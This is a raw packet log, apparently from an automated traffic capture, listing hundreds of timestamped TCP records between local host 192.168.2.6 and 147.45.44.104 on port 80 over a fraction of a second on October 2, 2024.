                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.587901115 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.587920904 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588044882 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588058949 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588068962 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588079929 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588093042 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588093042 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588128090 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588184118 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588227987 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588311911 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588323116 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588330984 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588340998 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588352919 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588355064 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588365078 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588373899 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588376999 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588388920 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588399887 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588417053 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588439941 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588615894 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588625908 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588638067 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588649035 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588653088 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588668108 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588674068 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588680983 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588692904 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588705063 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588716030 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588716984 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588726997 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588743925 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.588776112 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589190006 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589200974 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589210033 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589222908 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589240074 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589240074 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589251041 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589253902 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589267969 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589278936 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589279890 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589293957 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589304924 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589310884 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589317083 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589328051 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589332104 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589339018 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589351892 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589354992 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589364052 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589374065 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589385033 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589392900 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589396954 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589410067 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589421034 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589422941 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589432955 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589446068 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589459896 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589485884 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589854002 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589865923 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589878082 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589900017 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.589926958 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.590147972 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.590159893 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.590168953 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.590178967 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.590200901 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.590204000 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.590215921 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.590225935 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.590233088 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.590239048 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.590245962 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.590250015 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.590262890 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.590272903 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.590276003 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.590284109 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.590297937 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.590307951 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.590311050 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.590320110 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.590332985 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.590341091 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.590343952 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.590354919 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.590358973 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.590364933 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.590372086 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.590383053 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.590394020 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.590396881 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.590410948 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.590420961 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.590456009 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591094971 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591104984 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591114044 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591125965 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591135979 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591145992 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591146946 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591157913 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591170073 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591171026 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591181040 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591185093 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591196060 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591206074 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591211081 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591217995 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591229916 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591239929 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591243982 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591257095 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591260910 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591278076 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591289997 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591311932 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591695070 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591705084 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591715097 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591727972 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591737032 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591742992 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591747999 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591758966 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591768026 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591768980 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591778040 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591780901 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591793060 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591805935 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591816902 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591820002 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591830969 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591837883 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591842890 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591855049 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.591880083 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.596442938 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.678476095 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.678488016 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.678500891 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.678555965 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.678646088 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.678658009 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.678670883 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.678688049 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.678694963 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.678719044 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679024935 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679065943 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679074049 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679088116 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679100990 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679147959 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679189920 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679200888 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679213047 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679224014 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679236889 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679239988 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679254055 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679260015 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679271936 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679414034 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679426908 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679440022 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679447889 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679450989 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679464102 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679490089 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679510117 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679514885 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679529905 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679569960 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679660082 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679672956 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679682970 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679699898 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679712057 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679717064 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679724932 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679734945 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679747105 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679748058 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679764032 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679764032 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679796934 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679908991 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679922104 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679936886 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679948092 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679948092 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679961920 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679970980 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.679986954 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680011034 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680193901 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680208921 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680219889 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680232048 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680243969 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680243969 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680254936 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680274010 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680274963 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680280924 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680283070 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680284977 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680296898 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680298090 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680310965 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680319071 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680322886 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680330992 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680335045 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680350065 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680357933 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680396080 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680568933 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680581093 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680591106 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680615902 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680733919 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680746078 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680756092 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680768967 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680778980 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680782080 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680795908 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680804014 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680809021 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680815935 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680821896 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680834055 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680845022 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680846930 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680859089 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680871964 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.680896997 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.681044102 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.681055069 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.681066990 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.681078911 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.681091070 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.681114912 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.681204081 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.681217909 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.681227922 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.681238890 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.681248903 CEST8049711147.45.44.104192.168.2.6
